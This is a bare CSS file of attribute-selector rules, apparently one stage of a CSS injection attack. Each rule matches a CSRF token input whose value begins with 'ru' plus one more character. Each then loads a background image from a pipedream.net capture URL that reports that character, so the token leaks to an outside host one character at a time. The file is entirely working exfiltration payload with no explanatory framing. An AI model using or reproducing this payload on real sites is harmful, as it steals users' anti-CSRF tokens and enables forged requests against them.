input[name="csrf"][value^="rua"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=a)
}

input[name="csrf"][value^="rub"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=b)
}

input[name="csrf"][value^="ruc"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=c)
}

input[name="csrf"][value^="rud"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=d)
}

input[name="csrf"][value^="rue"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=e)
}

input[name="csrf"][value^="ruf"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=f)
}

input[name="csrf"][value^="rug"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=g)
}


input[name="csrf"][value^="ruh"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=h)
}


input[name="csrf"][value^="rui"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=i)
}


input[name="csrf"][value^="ruj"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=j)
}


input[name="csrf"][value^="ruk"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=k)
}


input[name="csrf"][value^="rul"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=l)
}


input[name="csrf"][value^="rum"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=m)
}


input[name="csrf"][value^="run"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=n)
}


input[name="csrf"][value^="ruo"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=o)
}


input[name="csrf"][value^="rup"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=p)
}


input[name="csrf"][value^="ruq"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=q)
}


input[name="csrf"][value^="rur"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=r)
}


input[name="csrf"][value^="rus"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=s)
}


input[name="csrf"][value^="rut"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=t)
}


input[name="csrf"][value^="ruu"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=u)
}


input[name="csrf"][value^="ruv"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=v)
}


input[name="csrf"][value^="ruw"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=w)
}


input[name="csrf"][value^="rux"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=x)
}

input[name="csrf"][value^="ruy"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=y)
}

input[name="csrf"][value^="ruz"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=z)
}



input[name="csrf"][value^="ruA"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=A)
}

input[name="csrf"][value^="ruB"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=B)
}

input[name="csrf"][value^="ruC"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=C)
}

input[name="csrf"][value^="ruD"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=D)
}

input[name="csrf"][value^="ruE"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=E)
}

input[name="csrf"][value^="ruF"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=F)
}

input[name="csrf"][value^="ruG"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=G)
}


input[name="csrf"][value^="ruH"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=H)
}


input[name="csrf"][value^="ruI"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=I)
}


input[name="csrf"][value^="ruJ"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=J)
}


input[name="csrf"][value^="ruK"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=K)
}


input[name="csrf"][value^="ruL"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=L)
}


input[name="csrf"][value^="ruM"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=M)
}


input[name="csrf"][value^="ruN"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=N)
}


input[name="csrf"][value^="ruO"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=O)
}


input[name="csrf"][value^="ruP"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=P)
}


input[name="csrf"][value^="ruQ"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=Q)
}


input[name="csrf"][value^="ruR"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=R)
}


input[name="csrf"][value^="ruS"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=S)
}


input[name="csrf"][value^="ruT"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=T)
}


input[name="csrf"][value^="ruU"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=U)
}


input[name="csrf"][value^="ruV"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=V)
}


input[name="csrf"][value^="ruW"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=W)
}


input[name="csrf"][value^="ruX"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=X)
}

input[name="csrf"][value^="ruY"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=Y)
}

input[name="csrf"][value^="ruZ"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=Z)
}

input[name="csrf"][value^="ru1"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=1)
}

input[name="csrf"][value^="ru2"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=2)
}

input[name="csrf"][value^="ru3"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=3)
}

input[name="csrf"][value^="ru4"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=4)
}

input[name="csrf"][value^="ru5"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=5)
}

input[name="csrf"][value^="ru6"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=6)
}

input[name="csrf"][value^="ru7"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=7)
}

input[name="csrf"][value^="ru8"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=8)
}

input[name="csrf"][value^="ru9"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?0=9)
}

